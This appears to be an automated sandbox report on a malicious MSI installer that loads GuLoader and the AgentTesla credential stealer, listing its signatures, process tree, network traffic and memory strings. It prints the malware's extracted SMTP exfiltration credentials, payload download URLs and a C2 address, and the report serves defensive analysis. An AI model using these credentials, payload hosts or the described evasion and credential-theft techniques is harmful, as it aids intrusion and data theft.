Play interactive tour

Edit tour

Analysis Report ot.msi

Overview

General Information

Sample Name:	ot.msi
Analysis ID:	380171
MD5:	946a444c46b1e672e4eb35725993e1de
SHA1:	12482793a22afbf1835887d0368ca0dc363f1ae7
SHA256:	40879e36f47835c7af7d4e54d844469e5a1f58fda44027a9005ca61bf33d4a6d
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: RegAsm connects to smtp port

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

msiexec.exe (PID: 3360 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\ot.msi' MD5: 4767B71A318E201188A0D0A420C8B608)

MSI7397.tmp (PID: 4792 cmdline: C:\Windows\Installer\MSI7397.tmp MD5: 287073F3D2C3100BA375B7BF0DB3B0D9)

ieinstal.exe (PID: 4232 cmdline: C:\Windows\Installer\MSI7397.tmp MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ota.exe (PID: 4900 cmdline: 'C:\Users\user\AppData\Local\Temp\ota.exe' MD5: F22F008D6287349195ADEF8975497D1F)

RegAsm.exe (PID: 1048 cmdline: 'C:\Users\user\AppData\Local\Temp\ota.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

asparagussens.exe (PID: 484 cmdline: 'C:\Users\user\Afkodedes8\asparagussens.exe' MD5: F22F008D6287349195ADEF8975497D1F)

RegAsm.exe (PID: 4784 cmdline: 'C:\Users\user\Afkodedes8\asparagussens.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 4800 cmdline: 'C:\Users\user\Afkodedes8\asparagussens.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

asparagussens.exe (PID: 1180 cmdline: 'C:\Users\user\Afkodedes8\asparagussens.exe' MD5: F22F008D6287349195ADEF8975497D1F)

RegAsm.exe (PID: 5612 cmdline: 'C:\Users\user\Afkodedes8\asparagussens.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "tshPv", "URL: ": "https://u28IS26ZRk5fJwhXK.org", "To: ": "Backup@fibertech.ae", "ByHost: ": "mail.fibertech.ae:587", "Password: ": "b7SbIQMcS0Agt", "From: ": "test@fibertech.ae"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4800	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 4800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4800	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 5612	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 1048	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 1048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1048	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 6 entries

Sigma Overview

System Summary:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 192.185.29.233, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 4800, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49855

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://mariotessarollo.com/or/ag.binhttps://www.sogecoenergy.com/or/ag.bin	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ot/ot.binen	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/=	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ot/ot.bini	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ot/ot.bin	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ot/ot.binhttps://www.sogecoenergy.com/ot/ot.bin	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ot/ot.binU	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ows	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/ot/ot.binb	Avira URL Cloud: Label: malware
Source: https://www.sogecoenergy.com/or/ag.bin	Avira URL Cloud: Label: malware
Source: https://mariotessarollo.com/or/ag.bin	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: RegAsm.exe.4800.22.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "tshPv", "URL: ": "https://u28IS26ZRk5fJwhXK.org", "To: ": "Backup@fibertech.ae", "ByHost: ": "mail.fibertech.ae:587", "Password: ": "b7SbIQMcS0Agt", "From: ": "test@fibertech.ae"}

Source: unknown	HTTPS traffic detected: 116.203.34.79:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.81.0.109:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.81.0.109:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.81.0.109:443 -> 192.168.2.3:49790 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://u28IS26ZRk5fJwhXK.org

Source: global traffic

TCP traffic: 192.168.2.3:49706 -> 79.134.225.109:6090

Source: Joe Sandbox View

IP Address: 79.134.225.109 79.134.225.109

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.109

Source: unknown

DNS traffic detected: queries for: www.sogecoenergy.com

Source: RegAsm.exe, 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	String found in binary or memory: http://aMDPVn.com
Source: ieinstal.exe, 00000004.00000002.1037038381.0000000000B7C000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: ieinstal.exe, 00000004.00000002.1037038381.0000000000B7C000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: ieinstal.exe, 00000004.00000002.1037038381.0000000000B7C000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: RegAsm.exe, 00000016.00000002.1047356210.000000001DD6D000.00000004.00000001.sdmp	String found in binary or memory: http://fibertech.ae
Source: RegAsm.exe, 00000016.00000002.1047356210.000000001DD6D000.00000004.00000001.sdmp	String found in binary or memory: http://mail.fibertech.ae
Source: RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/05
Source: ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.l
Source: ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: ieinstal.exe, 00000004.00000002.1045640426.000000001E54C000.00000004.00000001.sdmp	String found in binary or memory: http://www.yandex.comsocks=http=
Source: RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%$
Source: RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/
Source: ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/=
Source: RegAsm.exe	String found in binary or memory: https://mariotessarollo.com/or/ag.bin
Source: RegAsm.exe, 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, RegAsm.exe, 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/or/ag.binhttps://www.sogecoenergy.com/or/ag.bin
Source: ieinstal.exe	String found in binary or memory: https://mariotessarollo.com/ot/ot.bin
Source: ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/ot/ot.binU
Source: ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/ot/ot.binb
Source: ieinstal.exe, 00000004.00000003.526336094.0000000000B42000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/ot/ot.binen
Source: ieinstal.exe, 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/ot/ot.binhttps://www.sogecoenergy.com/ot/ot.bin
Source: ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/ot/ot.bini
Source: ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	String found in binary or memory: https://mariotessarollo.com/ows
Source: RegAsm.exe, 00000016.00000002.1047417899.000000001DD90000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1047431438.000000001DD98000.00000004.00000001.sdmp	String found in binary or memory: https://u28IS26ZRk5fJwhXK.org
Source: RegAsm.exe	String found in binary or memory: https://www.sogecoenergy.com/or/ag.bin
Source: ieinstal.exe	String found in binary or memory: https://www.sogecoenergy.com/ot/ot.bin
Source: ieinstal.exe	String found in binary or memory: https://www.sogecoenergy.com/ota.bin
Source: RegAsm.exe, 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: unknown	HTTPS traffic detected: 116.203.34.79:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.81.0.109:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.81.0.109:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.81.0.109:443 -> 192.168.2.3:49790 version: TLS 1.2

Source: ota.exe, 0000000C.00000002.420901484.000000000066A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Source: C:\Users\user\Afkodedes8\asparagussens.exe

Process Stats: CPU usage > 98%

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872AB2 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,LoadLibraryA,	4_2_00872AB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00875ADF LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,	4_2_00875ADF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871EEC TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871EEC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872BC0 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872BDA LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872BDA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871F4B LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871F4B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872CB4 LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,	4_2_00872CB4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872CCC LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872CCC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872003 LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872003
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872C13 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872C13
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872C33 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872C33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872C60 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872C60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872C7B LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872C7B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871D96 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871D96
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872D04 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_00872D04
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00875A8C LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00875A8C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00875A92 LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00875A92
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871E9B TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871E9B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872BA4 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872BA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871FA2 LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871FA2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872BBC LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872BBC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871FD3 LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871FD3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871F07 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871F07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871F2E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871F2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872B54 LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872B54
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00872B58 Sleep,LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00872B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00871F7C TerminateThread,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_00871F7C
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_0232070C NtSetInformationThread,	12_2_0232070C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_009460AF NtProtectVirtualMemory,	14_2_009460AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00946032 NtProtectVirtualMemory,	14_2_00946032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00946048 NtProtectVirtualMemory,	14_2_00946048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0094646B NtProtectVirtualMemory,	14_2_0094646B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00945DFF NtProtectVirtualMemory,	14_2_00945DFF
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_0211070C NtSetInformationThread,	19_2_0211070C
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D070C NtSetInformationThread,	20_2_020D070C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F060AF NtProtectVirtualMemory,	22_2_00F060AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F0646B NtProtectVirtualMemory,	22_2_00F0646B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F06048 NtProtectVirtualMemory,	22_2_00F06048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F06032 NtProtectVirtualMemory,	22_2_00F06032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F05DFF NtProtectVirtualMemory,	22_2_00F05DFF

Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_00401594	12_2_00401594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D403CCC	14_2_1D403CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D405473	14_2_1D405473
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D4047A0	14_2_1D4047A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D403A44	14_2_1D403A44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D405490	14_2_1D405490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D404750	14_2_1D404750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D404773	14_2_1D404773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D404730	14_2_1D404730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D404790	14_2_1D404790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D4046F0	14_2_1D4046F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_3_00E63843	22_3_00E63843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012B2D50	22_2_012B2D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012BA770	22_2_012BA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012B1FE0	22_2_012B1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012BBFD0	22_2_012BBFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012B2618	22_2_012B2618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012BBF70	22_2_012BBF70
